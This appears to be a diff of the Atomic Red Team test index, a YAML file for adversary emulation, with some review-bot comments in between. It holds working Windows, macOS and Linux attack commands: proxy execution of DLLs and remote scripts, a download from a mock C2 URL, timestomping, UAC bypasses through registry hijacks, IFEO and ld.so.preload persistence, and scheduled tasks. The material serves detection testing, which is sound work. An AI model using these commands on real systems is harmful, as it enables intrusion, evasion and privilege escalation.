|
Execute arbitrary DLL file stored locally. Commonly seen in application installation.
|
|
|
|
@@ -12145,11 +12144,11 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /y "#{dll_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Odbcconf.exe - Execute Arbitrary DLL
|
|
|
|
|
description: 'Execute arbitrary DLL file stored locally.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12168,7 +12167,7 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: InfDefaultInstall.exe .inf Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a .inf using InfDefaultInstall.exe
|
|
|
|
@@ -12193,7 +12192,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'InfDefaultInstall.exe #{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1216:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -12250,7 +12249,7 @@ defense-evasion:
|
|
|
|
|
description: 'Executes the signed PubPrn.vbs script with options to download
|
|
|
|
|
and execute an arbitrary payload.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12264,12 +12263,12 @@ defense-evasion:
|
|
|
|
|
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
|
|
|
|
localhost "script:#{remote_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
|
|
|
|
|
description: 'Executes the signed SyncAppvPublishingServer script with options
|
|
|
|
|
to execute an arbitrary PowerShell command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12282,12 +12281,12 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: manage-bde.wsf Signed Script Command Execution
|
|
|
|
|
description: 'Executes the signed manage-bde.wsf script with options to execute
|
|
|
|
|
an arbitrary command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12303,7 +12302,7 @@ defense-evasion:
|
|
|
|
|
cscript manage-bde.wsf
|
|
|
|
|
cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1151:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -12364,7 +12363,7 @@ defense-evasion:
|
|
|
|
|
- name: Space After Filename
|
|
|
|
|
description: 'Space After Filename
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -12426,7 +12425,7 @@ defense-evasion:
|
|
|
|
|
- name: Set a file's access timestamp
|
|
|
|
|
description: 'Stomps on the access timestamp of a file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -12439,11 +12438,11 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'touch -a -t 197001010000.00 #{target_filename}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Set a file's modification timestamp
|
|
|
|
|
description: 'Stomps on the modification timestamp of a file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -12456,7 +12455,7 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'touch -m -t 197001010000.00 #{target_filename}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Set a file's creation timestamp
|
|
|
|
|
description: |
|
|
|
|
|
Stomps on the create timestamp of a file
|
|
|
|
@@ -12500,83 +12499,106 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'touch -acmr #{reference_file_path} #{target_file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Modify file creation timestamp with PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
Modifies the file creation timestamp of a specified file.
|
|
|
|
|
|
|
|
|
|
This technique was seen in use by the Stitch RAT.
|
|
|
|
|
Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
|
|
|
|
|
To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_path:
|
|
|
|
|
description: Path of file to change creation timestamp
|
|
|
|
|
type: Path
|
|
|
|
|
default: "$env:APPDATA\\atomic.txt"
|
|
|
|
|
default: "$env:TEMP\\T1099_timestomp.txt"
|
|
|
|
|
target_date_time:
|
|
|
|
|
description: Date/time to replace original timestamps with
|
|
|
|
|
type: String
|
|
|
|
|
default: '1970-01-01 00:00:00'
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: A file must exist at the path (#{file_path}) to change the creation
|
|
|
|
|
time on
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
New-Item -Path #{file_path} -Force | Out-Null
|
|
|
|
|
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
New-Item #{file_path} -Force
|
|
|
|
|
Set-Content #{file_path} -Value "atomic test" -Force
|
|
|
|
|
Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" }
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force
|
|
|
|
|
command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}"
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Modify file last modified timestamp with PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
Modifies the file last modified timestamp of a specified file.
|
|
|
|
|
|
|
|
|
|
This technique was seen in use by the Stitch RAT.
|
|
|
|
|
Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
|
|
|
|
|
To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_path:
|
|
|
|
|
description: Path of file to change last modified timestamp
|
|
|
|
|
description: Path of file to change modified timestamp
|
|
|
|
|
type: Path
|
|
|
|
|
default: "$env:APPDATA\\atomic.txt"
|
|
|
|
|
default: "$env:TEMP\\T1099_timestomp.txt"
|
|
|
|
|
target_date_time:
|
|
|
|
|
description: Date/time to replace original timestamps with
|
|
|
|
|
type: String
|
|
|
|
|
default: '1970-01-01 00:00:00'
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: A file must exist at the path (#{file_path}) to change the modified
|
|
|
|
|
time on
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
New-Item -Path #{file_path} -Force | Out-Null
|
|
|
|
|
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
New-Item #{file_path} -Force
|
|
|
|
|
Set-Content #{file_path} -Value "atomic test" -Force
|
|
|
|
|
Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" }
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force
|
|
|
|
|
command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}"
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Modify file last access timestamp with PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
Modifies the last access timestamp of a specified file.
|
|
|
|
|
|
|
|
|
|
This technique was seen in use by the Stitch RAT.
|
|
|
|
|
Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
|
|
|
|
|
To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_path:
|
|
|
|
|
description: Path of file to change last access timestamp
|
|
|
|
|
type: Path
|
|
|
|
|
default: "$env:APPDATA\\atomic.txt"
|
|
|
|
|
default: "$env:TEMP\\T1099_timestomp.txt"
|
|
|
|
|
target_date_time:
|
|
|
|
|
description: Date/time to replace original timestamps with
|
|
|
|
|
type: String
|
|
|
|
|
default: '1970-01-01 00:00:00'
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: A file must exist at the path (#{file_path}) to change the last
|
|
|
|
|
access time on
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
New-Item -Path #{file_path} -Force | Out-Null
|
|
|
|
|
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
New-Item #{file_path} -Force
|
|
|
|
|
Set-Content #{file_path} -Value "atomic test" -Force
|
|
|
|
|
Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" }
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force'
|
|
|
|
|
command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}"
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
T1127:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -12709,7 +12731,7 @@ defense-evasion:
|
|
|
|
|
- name: MSBuild Bypass Using Inline Tasks
|
|
|
|
|
description: 'Executes the code in a project file using. C# Example
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12729,7 +12751,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1102:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -12796,7 +12818,7 @@ defense-evasion:
|
|
|
|
|
- name: Reach out to C2 Pointer URLs via command_prompt
|
|
|
|
|
description: 'Download data from a public website using command line
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -12805,14 +12827,14 @@ defense-evasion:
|
|
|
|
|
command: 'bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/
|
|
|
|
|
%TEMP%\bitsadmindownload.html
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Reach out to C2 Pointer URLs via powershell
|
|
|
|
|
description: 'Multiple download methods for files using powershell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -12917,9 +12939,10 @@ defense-evasion:
|
|
|
|
|
- name: MSXSL Bypass using local files
|
|
|
|
|
description: 'Executes the code specified within a XSL script tag during XSL
|
|
|
|
|
transformation using a local payload. Requires download of MSXSL from Microsoft
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
|
|
|
|
|
when test sucessfully executed, while AV turned off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
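Review bot: The sentence added to this description, `Open Calculator.exe when test sucessfully executed, while AV turned off.`, misspells "successfully" and reads as an instruction to the operator rather than as the observable result it is meant to describe; suggested wording: `Calculator.exe opens when the test executes successfully (AV must be disabled for this to work).`. The identical sentence is added in the "MSXSL Bypass using remote files" hunk and in the "WMIC bypass using remote XSL file" hunk, so the same fix applies there.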
@@ -12947,13 +12970,14 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: MSXSL Bypass using remote files
|
|
|
|
|
description: 'Executes the code specified within a XSL script tag during XSL
|
|
|
|
|
transformation using a remote payload. Requires download of MSXSL from Microsoft
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
|
|
|
|
|
when test sucessfully executed, while AV turned off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12969,12 +12993,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC bypass using local XSL file
|
|
|
|
|
description: 'Executes the code specified within a XSL script using a local
|
|
|
|
|
payload.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12995,14 +13019,15 @@ defense-evasion:
|
|
|
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
|
|
|
|
|
command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC bypass using remote XSL file
|
|
|
|
|
description: 'Executes the code specified within a XSL script using a remote
|
|
|
|
|
payload.
|
|
|
|
|
payload. Open Calculator.exe when test sucessfully executed, while AV turned
|
|
|
|
|
off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -13016,9 +13041,9 @@ defense-evasion:
|
|
|
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
|
|
|
|
|
command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
privilege-escalation:
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
@@ -13228,7 +13253,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Comma separated list of system binaries to which you want
|
|
|
|
|
to attach each #{attached_process}. Default: "osk.exe"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
type: String
|
|
|
|
|
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
|
|
|
|
|
atbroker.exe
|
|
|
|
@@ -13236,7 +13261,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Full path to process to attach to target in #{parent_list}.
|
|
|
|
|
Default: cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
type: Path
|
|
|
|
|
default: C:\windows\system32\cmd.exe
|
|
|
|
|
executor:
|
|
|
|
@@ -13330,7 +13355,7 @@ privilege-escalation:
|
|
|
|
|
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
|
|
|
|
|
to be loaded into each user mode process on the system
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -13343,7 +13368,7 @@ privilege-escalation:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'reg.exe import #{registry_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1138:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -13422,11 +13447,8 @@ privilege-escalation:
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Application Shim Installation
|
|
|
|
|
description: |
|
|
|
|
|
To test injecting DLL into a custom application
|
|
|
|
|
you need to copy AtomicShim.dll Into C:\Tools
|
|
|
|
|
As well as Compile the custom app.
|
|
|
|
|
We believe observing the shim install is a good
|
|
|
|
|
place to start.
|
|
|
|
|
Install a shim database. This technique is used for privelage escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete."
|
|
|
|
|
will be displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
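Review bot: The rewritten Application Shim description misspells "privilege" (`privelage escalation`) on the new line; suggested text: `Install a shim database. This technique is used for privilege escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete." will be displayed.`. The rewrite also drops the earlier prerequisites (copying AtomicShim.dll into C:\Tools and compiling the custom application); if they are still required, they belong in a `dependencies` entry with a `prereq_command` rather than being left implicit — the test's `input_arguments` and `executor` sit outside this hunk, so whether such an entry already exists is inferred, not visible here.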
@@ -13444,13 +13466,17 @@ privilege-escalation:
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
sdbinst.exe #{file_path}
|
|
|
|
|
sdbinst.exe -u #{file_path}
|
|
|
|
|
- name: New shim database files created in the default shim database directory
|
|
|
|
|
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
command: 'sdbinst.exe #{file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sdbinst.exe -u #{file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: New shim database files created in the default shim database directory
|
|
|
|
|
description: |
|
|
|
|
|
Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
|
|
|
|
|
|
|
|
|
|
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -13463,9 +13489,11 @@ privilege-escalation:
|
|
|
|
|
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
|
|
|
|
|
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
|
|
|
|
|
- name: Registry key creation and/or modification events for SDB
|
|
|
|
|
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
description: |
|
|
|
|
|
Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
|
|
|
|
|
the registry keys that were created. These keys can also be viewed using the Registry Editor.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -13592,7 +13620,7 @@ privilege-escalation:
|
|
|
|
|
cmd.exe /c eventvwr.msc
|
|
|
|
|
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Event Viewer (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
|
|
|
|
@@ -13613,12 +13641,12 @@ privilege-escalation:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
|
|
|
|
|
-ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Fodhelper
|
|
|
|
|
description: 'Bypasses User Account Control using the Windows 10 Features on
|
|
|
|
|
Demand Helper (fodhelper.exe). Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -13635,12 +13663,12 @@ privilege-escalation:
|
|
|
|
|
fodhelper.exe
|
|
|
|
|
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Fodhelper - PowerShell
|
|
|
|
|
description: 'PowerShell code to bypass User Account Control using the Windows
|
|
|
|
|
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -13659,7 +13687,7 @@ privilege-escalation:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
|
|
|
|
|
-Recurse -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using ComputerDefaults (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
|
|
|
|
@@ -13682,7 +13710,7 @@ privilege-escalation:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
|
|
|
|
|
-Recurse -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC by Mocking Trusted Directories
|
|
|
|
|
description: |
|
|
|
|
|
Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
|
|
|
|
@@ -13877,7 +13905,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
|
|
|
|
|
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -14109,7 +14137,7 @@ privilege-escalation:
|
|
|
|
|
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
|
|
|
|
|
description: 'Hooks functions in PowerShell to read TLS Communications
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -14223,7 +14251,7 @@ privilege-escalation:
|
|
|
|
|
- name: IFEO Add Debugger
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -14241,15 +14269,15 @@ privilege-escalation:
|
|
|
|
|
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: IFEO Global Flags
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -14341,7 +14369,7 @@ privilege-escalation:
|
|
|
|
|
- name: Launch Daemon
|
|
|
|
|
description: 'Utilize LaunchDaemon to launch `Hello World`
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -14679,7 +14707,7 @@ privilege-escalation:
|
|
|
|
|
- name: Plist Modification
|
|
|
|
|
description: 'Modify MacOS plist file in one of two directories
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -14772,7 +14800,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Appends a start process cmdlet to the current user''s powershell
|
|
|
|
|
profile pofile that points to a malicious executable
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -14999,7 +15027,7 @@ privilege-escalation:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'echo #{path_to_shared_library} > /etc/ld.so.preload
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Shared Library Injection via LD_PRELOAD
|
|
|
|
|
description: |
|
|
|
|
|
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
|
|
|
|
@@ -15017,7 +15045,7 @@ privilege-escalation:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'LD_PRELOAD=#{path_to_shared_library} ls
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Process Injection via C#
|
|
|
|
|
description: |
|
|
|
|
|
Process Injection using C#
|
|
|
|
@@ -15158,7 +15186,7 @@ privilege-escalation:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'at 13:20 /interactive cmd
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Local
|
|
|
|
|
description: "Upon successful execution, cmd.exe will create a scheduled task
|
|
|
|
|
to spawn cmd.exe at 20:10. \n"
|
|
|
|
@@ -15178,10 +15206,10 @@ privilege-escalation:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Remote
|
|
|
|
|
description: "Create a task on a remote system.\n\nUpon successful execution,
|
|
|
|
|
cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote
|
|
|
|
